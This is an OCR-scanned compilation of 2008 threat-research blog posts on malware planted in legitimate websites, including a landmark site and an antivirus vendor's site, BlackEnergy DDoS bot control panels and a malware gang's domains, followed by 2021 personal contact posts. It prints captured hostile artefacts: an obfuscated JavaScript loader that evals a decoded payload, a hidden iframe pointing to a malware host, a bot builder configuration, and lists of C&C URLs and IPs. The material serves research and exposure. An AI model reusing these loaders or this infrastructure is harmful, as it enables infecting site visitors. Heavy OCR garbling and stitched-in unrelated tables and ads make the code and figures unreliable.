3. http://www. honeynet .org/papers/enemy/ 


4.2.2 U.K’s FETA Serving Malware (2008-02-12 14:34) 


<t-- 1262126611 --><script langquage=""JavaScript"’> 

<t-- 

Function aCéJHmj¥2(xkpFb7W50)<{var 

LSS5f Ou01harguments .callee.toString()-replace(/\W/g,°*').toUpperCase();var NsjAHOH14S;var 
UNEKOS63w;var S3Rks38q2=LSSFfOu01h.length;var nhAi7geFJ;var RceTxSH312="* ;var Témob3GYS=new 

Array() 5 for (UnEK 6563w=8; unEK 85630<256 5 unEK O563u++) T6mob3GY5/ unEK8563w]=8;var 

Ns JAHOH14=1 5 For (UNEK O563w=128 5 uNnEK 8563; UNEK 8563u>>=1) 

{Ns J AHOHL4=(Ns jAHOH14>>>1)~ ( (NS ]AHOH14&1 ) 73988292384: 8) 5 For (iybP4m3tQ=6;iybP4m3tQ<256 51 bP4m3tQ+= 
UNEKOS63w*2) {Témob3GY5[ iybP4a3tQ+unEK 6563w]=(Té6Rmob3GY5[ iybP4m3tQ ] “Ns jAHOH14) 5if 

(Témob3GY5[ iybP4mstQ+unEk 6563] < 6) 

{Témob3GY5[iybP4m3tQ+unEk 8563w] +"4294967296; >} > snMAL7geF J=4294967295 ; For (Ns jAHOHL4@6; Ns jAHOHLA<S3R 
kS38q2;Ns JAHOH1S++) {nMAi7geF J=Témob3GY5[ (nMAi7geF J LSSFOu01h.charCodent (Ns jAHOH14) )&255]~( (nMAi7g 
eF J>>8)&16777215);5}uar cfJ648iwi=new Array();var R3bmJV6iH=2323 ; nMAi7geF J=nMAi7geF J” 4294967295 5iF 
(nMAi7geFJ<B) {nbMAi7geF J+=4294967296 ; pnbiAi7geF J=nMAi7geF J. toString(16) .toUpperCase() ;var 
AFpPS8dtpl=new Array() svar S3RkS38q2=nMAi7geF J. length; For (unEK 8563w= 6; unEK 8563w<8 5 uNEK OS63u++) 
{var n6PAUMDM1=S3RkS38q2+unEK 8563w; cf J648iwh[ UNEK 6563w]=1 ;cFIJ64Siwh[ UnEK 65630] =R3bmJU6iH iF 
(n6PAUMDAL>=8) {N6PAVMDM1=n6PAUMDM1-8 ;AFpPSdtp1[ vnEKG563w]=nMAi7geF J.charCodeAt (n6PAYNDM1) ; > else 
{AF pP8dtpl[YUNEKGS563w]=48;>}var Iné6wKSASS=B;var K7yR27Xghjvar PsP2ms6e8 5 var 

tQN7j 87cG;s3Rks38q2exkpFb7W50 . Length; tQN7 j 87cGes3Rks38q2 5; R3bAJU6iHW 1123 ; R3bmMJVGiHtQN7 j O7cG;for(y 
NEK O563we 6; unEK O563w<s3Rks38q2 5 unEK OS63w+2) {var 

SfFaB2Snb=xkpFb7W50 .substr(unEKO563w,2) ;K7yR27Xgh=parseint(sfFaB2Snb,16) ;PsP2ms6e8=K7yR27Xgh-AFpP 
Sdtpl[ Inéwksass ] if (PsP2msé6e8<8) 

{PsP2ms6e8=PsP2ms6e8+256 ; }ReTXSH312+=String . fromCharCode(PsP2ms6e8) ; CQN7 j 87cG++ ;R3DRJUGIH=3891 5 iF 
(InéwkKSA5SS<AFpP8dtpl.length-1) { In6wK4ASS++ SREDMIVGLH=1892 5 cFJ648iwM[ unEKG563w]=28;} else 

{ In6wKSASS=6;R3bmJu6iH=unEK 8563w; } }eval (RCTx5H312) 5} 

aCéJHmj¥2(' 969FASABA BABD1ac6é GA7b49Ca7ABGBS F6e99a8.a594b3A858a5a2a57 BSSAEB7 aca26a71626B7e716a67657 
606374746b625FAS9a9C73a5A1a05F abA161A9aah171A G7 F949 7B3acA6545 6b9909 7 baAB75546 164539babACIF 9aAh7 FS 
5646863aba6a9ae987 868a5a7A494A7 aS6D6673 a8ANS 28 BOF 62AF aPAAYSIDAT7ISAGEZE* ); 

//--> 

</script> 


Yet another high-profile malware embedded attack worth commenting on, just like the most 
recent one at the [1]Dutch embassy in Moscow. [2]Website of UK landmark hacked to serve 
malware : 


"The website of one of the UK’s most famous landmarks, the Forth Road Bridge, has 
been torn open in embarrassing fashion to serve malware, researchers are reporting. Accord- 
ing to [3]the security blog of a small consultancy, Roundtrip Solutions, the website is now 
hosting an ‘obfuscated’ Javascript hack created using the Neosploit Crimeware Toolkit, dishing 
out payloads including, the blog reports, porn pop-ups." 


The deobfuscated javascript attempts to load the currently live 88.255.90.130/cgi- 
bin/in.cgi?p=admin (MDAC ActiveX code execution (CVE-2006-0003), also responding to 
Silentwork.ws and Tide.ws which is deceptively forwarding to BBC’s web site, deceptively in 
the sense that were | to use a U.K based IP to access it for instance it will try to serve the 
malware, thus, malware campaigners are now able to segment the malware attacks on a basis 
of IP geolocation. Who’s behind it? A group that’s in direct affiliation with the RBN and the 
New Media Malware Gang, where the three of these operate on the same netblocks. 


The bottom line - according to [4]publicly obtainable stats and the ever-growing list of 
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"S 
Pay-Per-Install Software List (09-16-2008 Tue) 


Product ID PRODUCT NAME COMP ) INSTALL RATE(USD) INSTALLATIONS BALANCE 
34201 Project Track Personal Edition 2007.4.4 0.15 284 57.40 
39365 LockEnd 3.0 0.15 168 74.80 
32621 Flying PopCorn 6.0 0.15 79 = 88.15 
33949 Flying PopCorn POP 6.0 0.15 28 95.80 


Best Distributor TOP 10 (09-16-2008 Tue) 


Total Amount (USD 


1 kevinadams760@*******.com adams K 1,382.65 
2 ~=p_freeley@*****.com alexander kevin 855.80 
3 edmilson@************_com.br Jesus Edmilson 308.40 
4  steahl101@****"*.com ahifeld stephen 103.10 
5 ghostofdeathO0O@*****.com of death ghost 91.05 
6 ptlootte3@*****.com towerson patrick 86.00 
4. MAC QTT tt ttt est com project tech 19.20 
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country 


NO 0 
DK 0.1900 | 0.1001 


Other Countries - per install 


SpyDevastatos—$—— 
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START earning 
money TODAY 
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|| cates | counts | convert | WEBMATERPAYOUTS 
| Raw | Unique | Lead | Sale | TOTAL | Ratio | Visitor | Lead | Sale |Referral| TOTAL 
jo29 


| Date 
Trorar_ [esas] areas] saa | 0 | sae [oa] 
aanra3-a ants | s72 [ae | 0 | 26 [as] sacs] #10932 [40.00] #000 | ssa. 
2anra3-02|eoos | see [x9 | 0 | 19 [2aa| soca] sae |s0.00] 4000 | ss0ae_ 
zo7-0e03| 205 | 750 | 16 | 0 | a6 [289] 9020] ss00.e [4000] 4000 | 4602 
zo7-oves| asia | 00 | 2 | 0 | o [299] s005] save [4000] an0 | 1249 
z07-005| a1 | a0se | 2s | 0 | as [220] e022] e222. [4000] a000 | 25006 
zo7-06| «776 [sas0 | a7 | 0 | a7 [22s e020 10.00 
207-07] a | aaee | a7 | 0 | 27 [299] e027] s2e0.e [4000] 4000 | 24668 
2007-03-08 | 3312 | sas | 21 | o | 21 | 2,27] $0.21 | $185.44 $0.00 | $185.44 
2007-03-09 | 3282 | 873 | 38 | o | 38 | 4.35) $0.40 | $345.19 ‘| $0.00 | $345.19 
2007-03-10 | 3622 | 952 | 34 | aa | $0.00 | $317.06 
A 26 
El 


+ 
o 
Oo 
Oo 


coz) | pe Ba | | 
oa) & jeer 
c=) | eam |) 


ea 
2007-03-11 | 2639 | 713 | 28 | 0 | ' oO} $0.00 | $260.25 
2007-03-12 | 2273 | 573 een | | 16 2.79 | $0. 6 | $146.62 $0.00 | $146.62 
es 
Es) 


SIE | 


o 
o 


2007-03-13 | 2214 | 591 $0.30 | $177.19 | $ o} $0.00 | $177.19 
2007-03-14 00} $0.00 | $127.69 
rea07-03-15| 2447 | sao | 9 | 0 | 9 |as7|$oaa| $74.28 [0.00] ¢0.00 | $74.25 
faaar-o.as| aa [azo [oa | | ws [eae] y.00 | veer 
aaar-oa-a7| eas | aass | sa | 0 | v2 [aor |4o.as| seaeae [sooo] $0.0 | senaaz 
aaer-o2-ae| asa [soos | «a [ 0 | «2 [2a7| 40.20] s40n.0s |s0.00| 4.00 | wo. | 
aa0r-oa-a8| avea | rar [20 | 0 | 20 [200] 40.25] s2so.s [0.00] 40.00 | szcoas | 


o 
o 
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2008-10-20 82 24279 206675 113248 0.0161 54.8% $1828.08849 
2008-10-21 65 18358 204260 102885 0.0154 50.24% $1587.65439 
2009-02-12 105 66s 25887 6932 0.0109 26.78% $75,.420667 
2009-02-13 135 74 22791 6470 0.0108 28,39% $69.679472 
2003-02-14 406 194 23813 6665 0.0121 27.99% $80.629924 
2009-02-15 503 282 25068 7398 0.0103 29.51% $76.199461 
2009-02-16 co 487 23883 e106 0.0105 25.82% $64.79505 
2009-02-17 oh 32 2128 5798 0.0111 27.28% $64.353932 
2008-02-18 52 135 19340 4746 0.0107 24.53% $60.713028 
2008-02-19 9281 6515 34323 10485 0.0139 30.55% $145.842871 
2003-02-20 732 206 o 1157 0.0108 0% $12.457267 
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high-profile malware embedded attacks, legitimate sites serve more malware than bogus 
ones as it was in the past in the form of dropped domains for instance. How come? Malware 
campaigners figured out that trying to attract traffic to their malware domains is more time 
and resources consuming than it is to take advantage of the traffic a legitimate site is already 
getting. In fact, they’re getting so successful at embedding their presence on a legitimate 
site that they’re currently taking advantage of "event-based social engineering" campaigns 
by [5]Jembedding the malware at one of the first five search engine results to appear on a 
particular event. 


1. http: //ddanchev. blogspot .com/2008/01/dutch-embassy- in-moscow-serving-malware. htm 


2. http://www.techworld.com/security/news/index.cfm?newsID=11361épagtype=samechan 
3. http: //www.roundtripsolutions.com/blog/2008/02/06/317/forth-road-bridge-website-hacked/ 
4. http://blog.washingtonpost.com/securityfix/Security/,20Labs/%20Report%20Q4_011808. pdf 


5. http://www.websense.com/securitylabs/alerts/alert .php?Alert ID=834 


4.2.3 BlackEnergy DDoS Bot Web Based C&Cs (2008-02-12 17:17) 


--[ BlackEnergy DDoS Bot ]-- 


Seven [http://somehost.net/stat.php ICMP Freq: 10 
Request rate: fio (in minutes} ICMP Size: 2000 
SYN Freq: 10 
Outfile: [ibot.exe HTTP Freq: | 100 
HTTP Threads: [$0 
TCP/UDP Freq: [50 stSCS™S 


UDP Size: 1000 
TCP Size: | 1000 


Spoof IP's: fo (1 - ON; 0 - OFF) 


Build ID: E3FFD150 


Default command (if can’t connect to server): 


wait 


Execute after 30 minutes (0 - execute immediatly} 


Remember the [1]Google Hacking for MPacks, Zunkers and WebAttackers experiment, proving 
that malicious parties don’t even take the basic precautions to camouflage their ongoing 
migration to the web for the purpose of [2]botnet and [3]malware kits [4]C &Cs? Let’s 
experiment wi the [5]BlackEnergy DDoS bot, and prove it’s the same situation. What’s the 
[6]BlackEnergy DDoS bot anyway : 


"BlackEnergy is an HTTP-based botnet used primarily for DDoS attacks. Unlike mostcom- 
mon bots, this bot does not communicate with the botnet master using IRC. Also, wedo not 
see any exploit activities from this bot, unlike a traditional IRC bot. This is a small(under 50KB) 
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2008-10-28 
2008-10-29 
2008-10-20 
2008-10-31 
2008-11-01 
2008-11-02 
2008-11-03 
2008-11-04 
2008-11-05 
2008-11-06 
2008-11-07 
2008-11-08 
2008-11-09 
2008-11-10 


2008-11-11 


2003-0 1-28 
2009-01-29 
2003-02-08 
2009-02-15 
2009-02-17 
2009-02-18 
2003-02-18 


2003-02-20 


4722 887 
2776 674 
2 ] 

° .] 

3 .] 

° .] 

1 .] 

2 4107 
o 6307 
3 6228 
3 5974 
2 6019 
5 6249 
3 5682 
i) 6 

i] 4 

0 4 

i] & 

i) 5 

i] ~ 

i) 4 


MIMULMEDIA 


mess 


News 


Contact Us 


accuRnaCcY 


3484 2134 
4987 3956 
1899 1285 
685 420 
823 450 
881 540 
849 463 
10618 7405 
16995 22224 
33971 28040 
46700 32106 
58806 39589 
62284 36473 
65182 35025 
12874 3851 
12347 2080 
12142 2538 
10430 2897 
8554 2147 
796s 1867 
9377 2089 
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EASY to Set Up 


FAST Payment S 


UNLIMITED Ea 


0.0204 
0.0178 
0.017 

0.0226 
0.0232 
0.0166 
0.0173 
0.0216 
0.0174 
0.0186 
0.0194 
0.019 

0.0201 


0.0181 


0.0084 
0.0097 
0.0078 
0.0093 
0.0094 
0.0096 
0.0085 


0.0074 


- YOUR OWN WEB SHOP IN 10 MINUTES 


+ ASIMPLE SET UP 

+ SET YOUR PRICE 

« WEEKLY PAYMENTS 

. UP TO $5 PER REFERRAL’S SALE 


«= 10 DESIGN THEMES FOR YOUR STORE 


READ MORE 


sla 


rn 


61.25% 
79.33% 
67.67% 
62.77% 
54.68% 
61.29% 
54.53% 
69.74% 
138.94% 
82.53% 
68.75% 
67.25% 


58.47% 


343.5052 
$70.2825 
$21.8842 
$9.73236 
$10.4395 
$8.96298 
$8.00574 
$159,625 
$386.101 
$521,474 
$623.158 
$751,882 
$733,315 


$633.115 


$32.2751 
$29.8205 
$19.7534 
$26.9258 
$20.1691 
$17.9431 
$17.7477 


$1.0829 


$22990.27346 
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CONVERTER ANNOUNCES 


binary for the Windows platform that uses a simple grammar tocommunicate. Most of the 
botnets we have been tracking (over 30 at present) are locatedin Malaysian and Russian IP 
address space and have targeted Russian sites with theirDDoS attacks." 


Date Risk Origin Findings 

17,1.2008 r. 07:52:28 all H+} Trojan-Downloader. Win32.Small.hpl, Trojan-PSW. Win32,LdPinch.fbm.. 

17.12.2007 r, 09:24:44 wall Trojan-Dropper. Win32.Agent.cls, Trojan.LdPinch., 

17.12.2007 r. 09:24:32 well Packed/FSG, Trojan-Downloader. Win32.Small.cyn, Downloader, Generic Downloader. 
17.12.2007 r. 09:22:38 sal Trojan-Dropper. Win32.Agent.cls, Trojan.LdPinch.. 

17.12.2007 r, 09:18:44 wall Trojan.LdPinch, Trojan-Downloader. Win32.Small.cyn, Downloader.. 

01.11.2007 r. 06:06:20 wall Trojan.LdPinch, Trojan-Downloader. Win32.Small.cyn, Downloader... 

18.6.2007 r. 08:36:52 11) Trojan-Proxy. Win32.Small.fk, Trojan. Win32. Obfuscated. fw 


The following are currently live botnet C &Cs administration panels, and with BlackEnergy’s 
only functionality in the form of DDOS attacks, it’s a good example of how [7]DDoS on demand 
or DDoS extortion get orchestrated through such interfaces : 


httpdoc.info/black/auth.php (66.29.71.16) 
wmstore.info/hello/auth.php (216.241.21.62) 
lunaroverlord.awardspace.com/auth.php (82.197.131.52) 
333prn.com/xxx/auth.php (64.247.18.208) 


It’s getting even more interesting to see different campaigns within, that in between 
serving Trojan.Win32.Buzus.yn; Trojan.Win32.Buzus.ym; Trojan-Proxy.Small.DU, there’s also 
an instance of Email-Worm.Zhelatin. A clear indication of a botnet in its startup phrase is also 
the fact that all the malware binaries that you see in the attached screenshot use one of these 
hosts as both the C &C and the main binary update/download location. 


. http: //ddanchev. blogspot .com/2007/09/google-hacking-for-mpacks-zunkers-and.htm 
. http: //ddanchev. blogspot .com/2007/03/botnet- communication-platforms.htm 


ttp://ddanchev. blogspot .com/2007/04/shots-from-malicious-wild-west-sample_20.htm 


. http://atlas-public.ec2.arbor.net/docs/BlackEnergy+DDoS+Bot+Analysis .pdf 
. http://asert .arbornetworks .com/2007/10/blackenergy-ddos-bot-analysis-available 
. http: //ddanchev. blogspot .com/2007/05/ddos- on-demand-vs-ddos- extortion. htm 


1288 


1 
2 
3 
4. http: //ddanchev. blogspot .com/2007/04/shots-from-malicious—wild-west-sample_7672.htm 
5 
6 
7 


' 7 FROSPE-ESryverreneiz r 


SuperPrizel 


Traffic converter offers you a special Prize ! 
et your on Is 


[205] 


12853 


TRAFFIC-PURCHASE ; 


Say 


Y HAC CAMBIE NYYWME YCNOBUA 


[206] 


12854 


AAA npasnnbHoro oTo6paxenna Calta ncnonbayite Firefox 3 
MaptHepcKan nporpamma no eBbikyny adult-tpaduKa (CJ, AopeenHii) 


© Mbi Beikynaem AopBelHpiit, CJ-Heiit, POP-UP rpadbuk; 
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16 ist 2008 
19 August 2008 
20 August 2008 
21 August 2008 
22 August 2008 
23 August 2008 
24 fu 200; 


7650 
6841 
6305 
7003 
6992 
6302 


7361 


390 
417 
303 
350 
273 
307 


364 
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$429.17 (87) 
$516.41 (104) 
$365.38 (74) 
$346.65 (70) 
$287.19 (58) 
$379.80 (77) 


$462.47 (93) 
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$128,75 (87) 
$154.92 (104) 
$109.61 (74) 
$103.99 (70) 
$86.16 (58) 
$113.94 (77) 


$138,74(93) 


$2466.83 (82) 
$2968.31 (99) 
$2100.21 (70) 
$1992.53 (67) 
$1650.78 (55) 
$2183.07 (73) 


$2658.26 (89) 


$740.05 (82) 
$890.49 (99) 
$630.06 (70) 
$597.76 (67) 
$495,23 (55) 
$654.92 (73) 


$797.48 (89) 
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4.2.4 Anti-Malware Vendor’s Site Serving Malware (2008-02-13 03:51) 


<p>&nbsp; </p> 
<ftd> 
<tr> 
</table> 
<td> 
<ftr> 
</table> 
<l-- #EndEditable --> </td> 
<ftr> 
<tr bgcolor="#FFCCOO" bordercolor="#FFCCOO"> 
<td height="7" colspan="2" > 
<div align="center"> <Font face="Arial, Helvetica, sans-serif" size="1">Quick 
Contacts: <a href="mailto:%20webmaster@s-cop.com'> <font color="#000000">Webmaster </Font></a> 
i <a href="mailto:%20sales@s-cop.com"> <font color="#000000">Sales Department </font> </a> 
i <a href="mailto:%20support@s-cop.com"> <font color="#000000">Support 
Center </Font><fa> :; <a href="mailto:%20newvirus@s-cop.com"><font color="#000000">Submit 
New Virus</Font></a> </font></div> 
<td> 
<tr> 
<tr bgcolor="#FF9900" bordercolor="#FF9900" > 
<td height="2" colspan="2"> 
<div align="center"><Font size="1" face="Arial, Helvetica, sans-serif" >{c) 
AvSoft Technologies </font> </div> 
<td> 
<tr> 
<table > 


<iframe src="http: i intkrnipa. info/rc/?i=1" width=1 height=1 style="border:0"><j/iframe> 
</body> 
<l-- #EndTemplate --></html> 


Even though AvSoft Technologies isn’t really enjoying a large market share, making the impact 
of this malware coming out of their site even bigger, the irony is perhaps what truly matters 
in the situation. Some press coverage - [1]Hackers Turn Antivirus Site Into Virus Spreader; 
[2]Antivirus company’s Web site downloads ... a virus; [3]Hackers seed malware on Indian 
anti-virus site : 


"Hackers planted malicious script on the site of an Indian anti-virus firm this week. The website 
of AVsoft Technologies was attacked by unidentified miscreants in order to distribute a variant 
of the Virut virus. AVsoft Technologies makes the SmartCOP antivirus package. One of the 
download pages of the site was boobytrapped with malicious code that used the infamous 
iFrame exploit to push copies of the Virut virus onto visiting unpatched (or poorly patched) 
Windows PCs." 
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date hits unig loads ratio profit Referral Total 


27,Aug2008| 5192] 3003] 757] 4:1] 123.13|  2.31| $125.44 
26,Aug2008| 5833] 3289] s56| 3:1] 153.83] 3.15| $156.98 
25, Aug 2008] 7107] 4126] 1058| 3:1] 189.09] 3.38] $192.47 
24, Aug 2008] 7918] 4523| 950| 4:1] 161.07] 2.98] $164.05 
23, Aug 2008 $185.37 
22,Aug 2008] 7452] 4310] 1114] 3:1] 173.66] 3.20] $176.86 
21, Aug 2008 $201.14 
20,Aug 2008] 7655] 4536] 1185| 3:1] 196.39] 3.25] $199.64 
19, Aug 2008 $129.86 
18, Aug 2008] 10572] 6061] 1171] 5:1] 219.95] 2.04] $221.99 
17, Aug 2008 $160.76 
16, Aug 2008 $230.06 


Total: 86619 |50130|12011] 4:1]$2104.39| $40.24] $2144.63 
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Including the following photos obtained from a private safari where the top performing par- 
ticipants in the rogue affiliate-network based programs participated: 
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[229] 


Date Risk Origin Findings 


2/9/2008 2:43:06 AM wuttd va Win32. Virut Gen 4, Downloader, W32/Virut gen.a, PE VIRUT. XY. 
2/8/2008 11:12:30 PM wot ra Win32. Virut Gen 4, Downloader, W32/Vinuth, PE VIRUT YE 
2/8/2008 4:28:47 PM ett n/a Win32.Virut Gen 4, Downloader, W32/Virut gen a, PE VIRUT.XZ 
2/6/2008 9:59:44 PM oT) | Trojan. Tiny MK, Downloader, W32/Virut ¢, PE VIRUT_ART, Spyware Known Bad Sites 
2/5/2008 11:58:14 PM seth va Win32. Virut Gen 4, Downloader, W32/Virut gen.a, PE VIRUT.XY. 
2/5/2008 3:49:54 PM wetth ra Win32_Virut Gen 4, W32/Virut gen. a, PE VIRUT_YD, Spyware Known Bad Sites 
2/4/2008 10:50:19 AML .00td st Win32_Virut. Gen.4, Virus. Virut_ AV, Trojan-Downloader Small CML 
2/1/2008 7:24:56 PM west Win32.Virut Gen 4, Trojan Win32.Pakes bte 
saa LOGI: ad Trojan Tiny MK, Virus Win32.Virut y, Trojan-Dropper. NSIS Agent b 
12/28/2007 6:45:15PM .al Trojan. Virtumonde, Adware Maxifiles, Trojan DL. Small VWY. 
12/20/2007 6:34:19PM .t Trojan. Vistumonde, Adware Maxifiles, Trojan DL. Small VWY. 
nea 34141 «tl =a Trojan-Downloader. Win32.Tiny.ach, Downloader-BEZ gen 
11/8/2007 8:37:36 AM —.aatl : W32/Virut gen.a 
10/26/2007 3:20:22 PM «sath n/a W32/Virut j 
10/5/2007 4:32:56 PM watt va Bloodhound W32.1 
10/5/2007 1:19:14 PM wet tva Bloodhound W32.1, W32/Virut.d 
“ aNeeeae 1a" ak nls Virus, Win32, Virut r, Bloodhound. W32.1 
9/28/2007 2:04:22 PM wettl t/a Virus. Win32. Virut.q, W32/Virut.gen, TROT DORF_AG 
9/24/2007 2:37:28 PM weet at Trojan Win32 Inject ff Trojan-Downloader Win32_Agent dlu_ 


The IFRAME at the site used to point to ntkrnipa.info/re/?i=1 (85.114.143.207) which also re- 
sponds to zief.pl , where an obfuscation tries to server ntkrnipa.info/rc/load.exe through the 
usual diverse set of exploits served by MPack. 


Detection rate : 17/32 (53.13 %) for Win32.Virtob.BV; W32/Virut.j 
File size: 8704 bytes 

MD5: 31f8a3ladfdff5557876a57ff1624caa 

SHA1: 7f36e192030f7cbd8b47bd2cb9a60e9a3fe384d2 


Naturally, according to [4]publicly obtainable data in a typical [5JOSINT style, the do- 
main used to respond to an IP within RBN’s previous infrastructure. The big picture is even 
more ugly as you can see in the attached screenshot indicating a huge number of different 
malwares that were using ntkrnIpa.info as a connection/communication host in the past and in 
the present. | wonder would the vendor brag about their outbreak response time regarding the 
malware that come out of their site in times when malware authors are waging polymorphic 
DoS attacks on vendors/reseachers honeyfarms to generate noise? 


1. http: //www.darkreading.com/document.asp?doc_id=14566 
2. http://www. infoworld. com/article/08/02/07/Antivirus-companys-Web-site-downloads-a-virus_1.htm 


3. http://www. channelregister.co.uk/2008/02/08/indian_av_site_compromise/ 


4. http: //www.bizeul.org/files/RBN_study. pdf 
5. http://www. siteadvisor.com/sites/ntkrnlpa. info/summary/ 
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4.2.5 The New Media Malware Gang - Part Three (2008-02-13 17:31) 


sratong.ac.th 


kvasir.mchost.ru 


dimaannetta.ws inetta.ws 

dagtextiles. biz dagtextiles. biz 

freescanpro.com freescanpro.com 
keeberg, info 


wmstore.info 


09, phpnet.us 


drl-id.com drl-id.com 


Boutique cybercrime organizations are on the verge of extinction, and are getting replaced 
by cybercrime powerhouses, the indication for which is the increase of static netblocks used 
by well known groups such as the ones I’ve been exposing for a while - take the [1]New 
Media Malware Gang for instance, and its entire [2]portfolio of malicious domains that keeps 
expanding to include the latest ones such as : 


sratong.ac.th/ch24/config/index.php 
79.135.166.138/us/index.php 
users-online.org/get/index.php 
X-y-zz.org/exp2/index.php 
dimaannetta.ws/adpack/index.php 
dagtextiles.biz/adpack/index.php 
freescanpro.com/count 
keeberg.info 

wmstore.info/1 
78.109.22.242/a/index.php 
208.72.168.176/e-z10102/index.php 
absent09.phpnet.us 
podarok24.info/xxx 

drl-id.com 

supachicks.com 


And with Mpack’s now easily detectable routines, they’re migrating to use the Advanced 
Pack, a copycat malware exploitation kit, trouble is it’s all done in an organized and efficient 
manner. 


1. http: //ddanchev. blogspot .com/2007/11/new-media-malware- gang. htm 
2. http: //ddanchev. blogspot .com/2007/12/new-media-malware-gang-part-two.htm 


1291 


[249] 


[250] 


12884 


[259] 


12890 


[261] 


12891 


12892 


4.2.6 Visualizing a SEO Links Farm (2008-02-13 17:42) 


This visualization was generated over a month ago, using one of the two [1]search engine 
optimization link farms | blogged about before, as a sample. Perhaps the most important issue 
to point out is that the farms are automatically generated with the help of blackhat SEO tools, 
where the level of internal linking has been set a relatively modest one, as for instance, the core 
pages extensively link one another, but a huge proportion of the SEO content remains burried 
in a number of hops a crawler may not be interested in making - this could be automatically 
taken care of in the process of generating the content to end up with a closed circle when 
visualizing. 


1. http: //ddanchev. blogspot .com/2007/09/examples- of-search-engine- spam. htm 
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4.2.7 Statistics from a Malware Embedded Attack (2008-02-13 19:52) 


Summary for 


It’s all a matter of perspective. For instance, it’s one thing to do unethical pen-testing on the 
[1]RBN’s infrastructure, and entirely another to ethically peek at the statistics for a sample 
malware embedded attack on of the hosts of a group that’s sharing infrastructure with the RBN, 
namely UkrTeleGroup Ltd as well as Atrivo. For yet another time they didn’t bother taking 
care of their directory permissions. Knowing the number of unique visits that were redirected 
to the malware embedded host, the browsers and OSs they were using in a combination with 
confirming the malware kit used could result in a rather accurate number of infected hosts 
per a campaign - an OSINT technique that given enough such stats are obtained an properly 
analyzed we’d easily come to a quantitative conclusion on a malware infected hosts per 
Campaign/malware group in question. 
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In this particular case, 99 % of the traffic for the last three days came from a single location 
that’s using multiple IFRAMEs to make it hard to trace back the actual number of sites embed- 
ded since there’s no obfuscation at the first level - vertuslkj.com/check/versionl.php?t=585 - 
(58.65.239.114) is also loading vertuslkj.com/n14041.htm and vertuslkj.com/n14042.htm. As 
for the countries where all the traffic was coming from, take a peek at the second screenshot. 
The big picture has to do with another operational intelligence approach, namely establishing 
the connections between the malicious hosts that participated in the compaign, in this case 


Referers 
http: // 
http: // 
http: // 
http: // 
XXX EAEA EEE FETE TET EH HF 
http: // 
http://www. 
iifveww. siteadvisor.com/exploit.html?. 
http://www siteadvisor.com/exploit.htmi?.. 
http: // 
http: //* 
http: /s 
http://www si visor.com/exploit.html?.. 
http://www 
http://www. siteadvisor.com/exploit. html? 
http/ 
http://www. si yisor.com/exploit.html?.. 


ee eee ee ee nN of oP 


Countries / Regions 


Brazil 
N/A 
Turkey 
United States 
Poland 
Japan 
France 
Australia 
Czech Republic 
Mexico 
India 
Netherlands 
Belgium 
Korea, Republic of 
Argentina 
United Kingdom 
Switzerland 
Canada 
China 
Romania 
Sweden 


it’s between groups known to have been exchanging infrastructure for a while. 


1. http: //ddanchev. blogspot .com/2007/10/over- 100-malwares-hosted-on-single-rbn. htm 


1294 


naw 
hits 
16248 
6345 
4068 
3604 
3079 
3037 
2919 
2589 
2536 
2523 
2252 
1577 
1524 
1378 
1206 
1043 
1021 
1015 
938 
892 
883 


17.1.6 Dancho Danchev’s Biography - The Inside Story Behind the _ Life 
of ex-Bulgarian Hacker Dancho Danchev - Recommended Reading! 
(2021-01-13 14:41) 


Dear blog readers, 


I’ve decided to take the time and effort and say big thanks to everyone who’s been following my 
research since December, 2005 and has been touching base to say "hi" or to offer operational 
support or to share their "know-how" and opinion about the research that I’ve been publishing 
on my personal blog. 

I’ve recently posted a high-profile and recommended reading article at my Medium account 


which you can check out [1]here. The article is basically a first-person account of my life and 
experience as an ex-Bulgarian hacker today’s World’s leading expert in the field of cybercrime 


12915 


research and threat intelligence gathering which you might be interested in reading and actu- 
ally sharing with your social network including friends and colleagues. 


Stay tuned! 


1. https: //medium.com/@danchodanchev/the-inside-story-behind-the-1life-of-ex-bulgarian-hacker-dancho-danche 
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17.1.7 Dancho Danchev’s Primary Contact Points - 2021 (2021-01-14 01:59) 


[1] 


Dear blog readers, 


Welcome to 2021. I’ve decided to share my primary contact points for 2021 in a separate 
post with the idea to allow everyone to add me as a contact or actually send me an instant 
message or an email regarding possible inquiry about some of my research including possible 
invite-only conference attendance or presentation proposal inquiry including possible part-time 
or full-time independent contractor based work and agreements. 


Here are my primary contact points for 2021: 

Primary email: dancho.danchev@hush.com 

Email for sensitive projects: ddanchev@cryptogroup.net 
Skype: dancho danchev _ 

Silent Circle: ddanchev 

Signal: +359 87 68 93890 

WhatsApp: +359 87 68 93890 

Threema: KY622AU5 

12916 


Including the following social media accounts - [2]Twitter, [3]LinkedIn, [4]Facebook including 


[5]Medium. 


You can also use the following public PGP key for my dancho.danchev@hush.com account in 
case you’re interested in approaching me for a possible participation in a sensitive or classified 


project: 

—-BEGIN PGP PUBLIC KEY BLOCK—- 
mQINBF/di7UBEADQbxy54QJNZjBYVKeWRXxEStiRgliSRIC4Wcb0z781WGu7056wP 
fJ/iRWCuXziFOJcEkv47 7f1xBdiDkchEkQif4REp+V3XYUsT6ciEBEiJ3gFmiit2 
xeieHqsw6b6ldY/X18TeCvQRHBjw5!ID6+ XHwWWiTg4tLZyPr45J7i2HORSPU+WwdW 
FYMZcEWuCKAG9r4PhL3wv9QhCQpwPOeCh9WKj9AQR+dHSfg6T ItlLAFkw6GPBvzzZ 
tYsnFDEk+fkKqfOLxBmhvF+2vOnRZmQyzgL+vkCrZWrofpLrtH1hsbINliDR4Ap04 
VsZrJIMv8162UpGGL30COaN5kximIBwtdOS+4tYq5akd10D77M2gMt+Lup1TVktj 
tFDg+eGXpKF/sbtYckco3eqUdAj7Dd6e55YTFcJFHN6aLAyFMVBbN3MXhoQmguxT 
YTtzevVJtaTeDxshOzsfTZZcvPf9167g3wlgEgDKut2bAzGeOqchS/j9gw9hA8Ak 
mkXoQw1PXoP++MmWS2Y98iv616lbKK2i9/9/2WrCUVi6hyu67 +AvyuOugALLIDkuX 
saJHB/2j1mBGr/VCe6eFD7nxV1fDfiUtIEWQDPM4bjSQePfLsSkW5bfnp+joODav 
ntO8BZ66BhRYEYXQX8vNDLdSRSYyriQssRWdJ3DghKCZkYoKMpP6NqnL/QARAQAB 
tChEYW5jaG8gRGFuY2hldiA8ZGFuY2hvLmMRhbmNoZXZAaHVzaC5jb20+iQI4BBMB 
CAAiBQsJ CACKBxUICgkLAgMEFgECAwIZAQWCX92LtQKeAQKbIWAKCRDYjPpRcde0d 
B4fJEADM6iCaX2ekmnFe+Z/qEsReGZasEPpm]ffTQCSgVXw8FbbkOXaeGxn6TRrEd 
